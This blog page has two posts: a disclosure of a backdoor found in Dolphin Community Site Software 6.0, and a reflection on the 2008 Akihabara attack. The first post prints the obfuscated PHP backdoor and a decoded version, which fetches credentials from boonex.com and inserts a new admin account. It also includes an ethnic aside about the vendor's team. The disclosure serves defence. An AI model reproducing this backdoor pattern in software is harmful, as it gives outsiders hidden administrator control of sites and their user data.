Dolphin Community Site Software, Security Backdoor

Someone has found a security backdoor in the code behind Dolphin Community Site Software.

Basically, this code – itself ineptly encoded to obfuscate itself – allows the programmers at Boonex.com to replace your admin login information in the database by sending a special command to your server. This will then allow them to log in as Admin give them complete access to your website and potentially, any database servers you are connected to.

Bear in mind that this software is primarily used for community sites, dating sites and other social networking sites and one can see the potential data mining rewards available.

p.s. the Boonex team is Russian.

Here is his post (English is not his first language):

—————————-

I was checking some of the encoded code in the version 6.0 of Dolphin.
I found a bloody serious security problem. Actually it is more than just a problem, but a criminal issue.

Please search for the following line in “inc/admin.inc.php” (this is all on one very long line)

aWYoICRfR0VUWydwYWdlJ10gKSBmb3JlYWNoKCAkX0dFVC
BhcyAkc0tleSA9PiAkc1ZhbHVlICkgewppZiggZ2V0dHlw
ZSggJHNLZXkgKSAhPSAnc3RyaW5nJyBvciBzdHJsZW4oIC
RzS2V5ICkgPCAxMCBvciBzdHJsZW4oICRzVmFsdWUgKSA8
IDEwIG9yIG1kNSggJHNLZXkgKSAhPT0gJzhmMGFlNTk2Nm
U4NzI3ODhiY2UzNTU4NjNlYWJmYzBjJyBvciBtZDUoICRz
VmFsdWUgKSAhPT0gJzJhMzJhNDJhZWRiZDY0MmNmZmE0MG
Y4ZWMwNjZmMmE0JykgY29udGludWU7CmlmKCBzdHJsZW4o
ICRzUGFzc1BhZ2UgPSBwcmVnX3JlcGxhY2UoICcvW15hLX
pBLVowLTlfXC4tXS8nLCAnJywgJF9HRVRbJ3BhZ2UnXSAp
ICkgYW5kICRhUGFzc0ZpbGUgPSBAZmlsZSggJ2h0dHA6Ly
93d3cuYm9vbmV4LmNvbS8nIC4gJHNQYXNzUGFnZSApICkg
ewpmb3JlYWNoKCAkYVBhc3NGaWxlIGFzICRpSW5kID0+IC
RzTGluZSApICRhUGFzc0ZpbGVbJGlJbmRdID0gYWRkc2xh
c2hlcyggdHJpbSggJHNMaW5lICkgKTsgaWYoIG1kNSggJG
FQYXNzRmlsZVswXSApID09PSAnZGFkNDA5NjYwMjQ3N2Qz
MTllMDRlZWZiMzg2OTdmZDMnICkKZWNobyAoIGRiX3Jlcy
ggIkRFTEVURSBGUk9NIGBBZG1pbnNgIFdIRVJFIGBOYW1l
YCA9ICd7JGFQYXNzRmlsZVsxXX0nIiwgMCApIGFuZCBkYl
9yZXMoICJJTlNFUlQgSU5UTyBgQWRtaW5zYCBTRVQgYE5h
bWVgID0gJ3skYVBhc3NGaWxlWzFdfScsIGBQYXNzd29yZG
AgPSAneyRhUGFzc0ZpbGVbMl19JyIsIDAgKSApID8gJ2Fk
ZCBzdWNjZXNzJyA6ICdhZGQgZmFpbGVkJzsgZXhpdDsgfS
BicmVhazt9

Do you know what it is?

I have just decoded it for you:

if( true || $_GET[‘page’] ) foreach( $_GET as $sKey => $sValue ) {
   if( gettype( $sKey ) != ‘string’ or strlen( $sKey ) < 10 or strlen( $sValue ) < 10 or md5( $sKey ) !== ‘8f0ae5966e872788bce355863eabfc0c’ or md5( $sValue ) !== ‘2a32a42aedbd642cffa40f8ec066f2a4’) continue;
   if(true ||  strlen( $sPassPage = preg_replace( ‘/[^a-zA-Z0-9_\.-]/’, ”, $_GET[‘page’] ) ) and $aPassFile = @file( ‘http://www.boonex.com/&#8217; . $sPassPage ) ) {
   foreach( $aPassFile as $iInd => $sLine ) $aPassFile[$iInd] = addslashes( trim( $sLine ) ); if( md5( $aPassFile[0] ) === ‘dad4096602477d319e04eefb38697fd3’ )
   echo ( db_res( “DELETE FROM `Admins` WHERE `Name` = ‘{$aPassFile[1]}'”, 0 ) and db_res( “INSERT INTO `Admins` SET `Name` = ‘{$aPassFile[1]}’, `Password` = ‘{$aPassFile[2]}'”, 0 ) ) ? ‘add success’ : ‘add failed’; exit; } break;
   }

It is simply hacking your code and inserting ADMIN into your admin table.
If anybody is using version 6.0 , I would suggest you check your DB immedeately.
Of course don’t forget to remove those lines from your code.

I have no idea about newer versions. I think It is a good idea to check them as well.
Maybe they have changed their hacking style in recent versions.

I hope this will save many sites from being hacked by the programmers of the Dolphin.

Regards

Three minute’s silence for the victims of Akihabara stabbing

Regardless of creed or culture, there’s no denying the horror of the event that was witnessed in Akihabara on Sunday, where a man in his mid twenties hired a van in Shizuoka, several hours drive away, with the sole intention of ploughing it into a crowded pedestrian area, climbed out of his van and then proceeded to attack the crowd with a hunting knife. Of the people hit by the van and stabbed, seven died.

>> BBC Link

As one of my favourite areas in Japan, the reality that such an event could occur right here, under our noses is horrific.

As a father and husband, the thought that such random violence can, at any time intrude upon our lives and bring all that we have built, all that we cherish crashing to the ground, fills me with sadness. On of Japan’s major plusses, which I hold dearly above virtually all others is the safety inherent in living here. The knowledge that even at night, it is safe to walk the streets with very little chance of being mugged for something as trivial as a pair of trainers or a mobile phone.

Instead, to have this heinous crime committed brings home the fact that no matter where you are, evil, real evil exists.

Evil Exists – You’re staring into it’s face right at this moment

If there is any good to come of this incident, then I believe it will come from the heightened awareness that a disaffected underclass exists beneath the surface of our society, and that disaffection and disassociation must be tackled at the source if we are to prevent such tragedies occurring again.

This, however, offers scant relief to the families of those affected, who must feel a pain and emptiness in their hearts that calls out for justice or revenge. I offer my sincerest hopes and wishes to all affected that their pain will be appeased, somehow.

Please, take a moment out of your busy schedule to reflect on this tragedy. For, small though it may seem in the ugly morass of destruction that we are forced to witness with every day, it is very real to those who’s lives were irrevocably changed on Sunday, 8th of June, 2008.